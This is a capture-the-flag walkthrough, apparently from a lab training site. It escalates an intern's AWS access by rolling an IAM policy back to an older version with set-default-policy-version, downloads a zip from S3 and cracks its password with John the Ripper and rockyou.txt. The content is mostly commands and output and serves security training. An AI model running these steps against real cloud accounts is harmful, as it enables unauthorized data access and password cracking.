Escalate Privileges by IAM Policy Rollback

A walkthrough demonstrating how to abuse the IAM permission: SetDefaultPolicyVersion

Overview

In this walkthrough, we're provided access keys for an Intern with seemingly little access, but we find a way to escalate our privileges and obtain access to sensitive data!

Pre-Requisites

Install awscli: brew install awscli (mac) apt install awscli (linux)
Install JohnTheRipper: brew install john (mac) apt intall john (linux)

Walkthrough

After configuring our AWS access keys (⁠aws configure⁠), let's begin to enumerate our access.

This command tells us who we are.

aws sts get-caller-identity

{
    "UserId": "AIDA4C7XGDAETYJA6EVGF",
    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"
}

We can then list policies attached to this user.

aws iam list-attached-user-policies --user-name intern01  
                       
{
    "AttachedPolicies": [
        {
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"
        }
    ]
}

Let's see if we have multiple versions of this policy.

aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy

{
    "Versions": [
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"
        }
    ]
}

We can view both policies like so: aws iam get-policy-version --policy-arn arn:aws:iam::214768663777:policy/intern_policy --version-id v1 (or v2).

aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "ec2:DescribeInstances",
                        "s3:ListAllMyBuckets",
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"
    }
}

Escalating Privileges

The v1 policy gives us some additional S3 permissions over all resources. We'll set this version as our policy.

aws iam set-default-policy-version --policy-arn 
arn:aws:iam::831057696777:policy/intern_policy --version-id v1

If we list the buckets in the account, we'll find one and download the data.

aws s3 ls    
                                                                           
2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538

aws s3 cp s3://huge-logistics-data-8344bf3ad538/amex-export.zip .

download: s3://huge-logistics-data-8344bf3ad538/amex-export.zip to ./amex-export.zip

Password Cracking

Unfortunately, the file is password-protected.

unzip amex-export.zip 

Archive:  amex-export.zip
[amex-export.zip] amex-export.json password:

Not to worry as we can attempt to crack the password.

We'll create a hash and save it to a new file.

zip2john amex-export.zip > hash.txt

Next, we'll use JohnTheRipper and the classic rockyou.txt password list.

john hash.txt --wordlist=rockyou.txt

1logistics       (amex-export.zip)

Finding the Flag!

We found the password! Attempting to unzip the file with this password results in discovering the flag!

unzip -P 1logistics amex-export.zip 

Archive:  amex-export.zip
  inflating: amex-export.json        
 extracting: flag.txt

Get the final flag.

cat flag.txt      
  
<flagHash>

PreviousCTFs - PwnedLabs NextExploiting Weak S3 Bucket Policies

Last updated 1 month ago